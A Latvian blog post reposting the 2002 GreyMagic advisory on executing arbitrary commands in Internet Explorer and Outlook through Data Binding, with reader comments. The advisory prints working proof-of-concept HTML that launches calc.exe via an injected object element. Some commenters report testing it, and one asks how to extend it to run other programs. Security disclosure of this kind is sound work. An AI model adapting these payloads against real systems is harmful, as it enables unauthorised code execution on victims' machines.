Tavu IE var *izņemt* pat bez Active Scripting vai ActiveX

Es zinu, ka lielākai daļai jau ir pieriebušās šīs ziņas par Internet Explorer un Outgļuka caurumiem, bet ne jau es tos rakstu 😉
Tos kurus interesē kā viņu mazo iāa var paņemt cauri pat pie neaktivizētām Active Scripting or ActiveX iespējam var lasīt tālāk pārējie atpūšas.
Executing arbitrary commands without Active Scripting or ActiveX

GreyMagic Security Advisory GM#001-IE
=====================================

by GreyMagic Software, Israel.
27 Feb 2002.

Topic: Executing arbitrary commands without Active Scripting or ActiveX.

Discovery date: 25 Feb 2002.

Affected applications:
======================

Any application that hosts the WebBrowser control (5.5+) is affected since this exploit does not require Active Scripting or ActiveX. Some of these applications are:

* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express

Introduction:
=============

In an advisory from Jan 10 2002 “The Pull” demonstrated how it is still possible to use an older bug (initially discovered by Dildog) in the <object> HTML element to run arbitrary commands.

Although “The Pull”‘s findings were interesting, his analysis of the re-found bug was erroneous, the problem does not lie within the Popup object, the problem is with dynamically inserted HTML fragments at any point in the document.

All “createPopup” does is create a (featureless) window containing an empty HTML document, this does not pose a threat, but later on, that document has HTML injected to it (using innerHTML), which is the actual problem.

For example, the following code will work just the same:

<span id=”oSpan”></span>
<script language=”jscript” defer>
oSpan.innerHTML='<object
classid=”clsid:11111111-1111-1111-1111-111111111111″
codebase=”c:/winnt/system32/calc.exe”></object>’;
</script>

(Note: innerHTML is not the only property used to dynamically insert HTML to any element, it is also possible to use outerHTML, insertAdjacentHTML and more to gain the same results.)

Discussion:
===========

So now that we identified the origin of the problem we can search for ways to dynamically insert HTML without using any Active Scripting at all. It will then become possible to use this bug in more “protected” environments,
such as Microsoft Outlook or Internet Explorer with Active Scripting and ActiveX disabled.

One of the exciting features that came along in IE4 was Data Binding; it enables developers to completely separate any application data from the presentation layer. The data sources (DSO) for Data Binding can be almost anything, CSV files (with TDC), HTML, XML and many more. Data Binding binds HTML elements (data consumers) such as div or span to the DSO without need for a single line of script code.

We found out that when the “dataFormatAs” attribute is set to “HTML” on the consumer, Data Binding internally uses innerHTML in order to insert the data into the element (otherwise innerText is used).

So all we need to do now is supply a DSO that contains the offending <object> element, the rest will be done for us by the Data Binding engine, no scripting needed.

Exploit:
========

In the following example we’re using an XML data-island as our DSO and a span element as the data consumer. Using XML is especially comfortable because it can be embedded within the document, without need for external requests that may be stopped by the host application.

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security>
<exploit>
<![CDATA[
<object id=”oFile”
classid=”clsid:11111111-1111-1111-1111-111111111111″
codebase=”c:/winnt/system32/calc.exe”></object>
]]>
</exploit>
</security>
</xml>

Solution:
=========

There is no configuration-tweaking workaround for this bug, it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.

Tested on:
==========

IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

Demonstration:
==============

We put together two proof-of-concept demonstrations:

* Simple: attempts to run “c:/winnt/system32/calc.exe”.
* Advanced: lets the user pick what they want to run.

They can both be found at http://security.greymagic.com/adv/gm001-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

– Copyright © 2002 GreyMagic Software.
======================================
Ierakstam kaut ko garšīgu un palaižam jebko.

9 thoughts on “Tavu IE var *izņemt* pat bez Active Scripting vai ActiveX

  1. K

    mnjaaaaaa. ietesteeju, man ljoti smuki palaidaas kalkulators. shis ir ljoti baiss caurums. patiesi.
    konfiguraacija:
    paarluuks: ie6 + latest patches
    visas fignjas: off
    bombardeejiet m$ ar mailiem, lai taisa pachu (btw ja saki ka nelieto ie bet kaadu citu paarluuku, kas izmanto iexplorera staffu – taapat truba. jeb vai man nav taisniiba?)

    Atbildēt
  2. GT

    Notestēju uz W2K un IE6 ar visiem ielāpiem. CALC.EXE tomēr nepalaidās 🙂 🙁 Nodomāju – kaut kas nav kārtībā ar kompi. Pārstartēju. Vienalga nekā. Tad atcerējos, ka nesen nolēmu ieviest kārtību un ikdienā strādāt kā Restricted User. Pārliku sevi uz Administrators. CALC.EXE palaižas, ka prieks. Pārliku sevi uz Standard Users. Palaižas, maita, ka tavu…
    Morāle. Ja reiz NT ir iespēja būt par Restricted User, tad ir vērts to izmantot. Tomēr kaut nedaudz drošāk 🙂 W98 lietotājiem, protams, Chupa Chups.
    P.S. Notestēju vēlreiz the Pull. Pop-Up Exploit nenostrādā 🙂 File:{CLSID} nostrādā 🙁

    Atbildēt
  3. Aleksejs

    Uz 2000/XP var Exploreri laist, kaa Guest/vai tml. lietotaajs (nu tjipa ar Run As..), tad var arii dabuut cik necik sakariigu droshiibu pret shaadaam “by design feature”( (c)M$ ).
    BTW vai ir daudz taadu, kas *NIXaa cauraam dienaam seezh zem root accounta? Domaju, ka daudz mazaak, nekaa to, kas seed NT/2000/XP kaa admini.

    Atbildēt
  4. Yobis

    Un ko mees varam iesaakt ar palaistu winkakulatoru? Cik es ieproveeju, tad nekaadus parametrus klaat aiz exe arii nav iespeejams pieaakjeet! 🙁 un neko citu bez exe arii neizdevaas palaist…

    Atbildēt

Atbildēt uz komentāru Aleksejs Atcelt atbildi

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *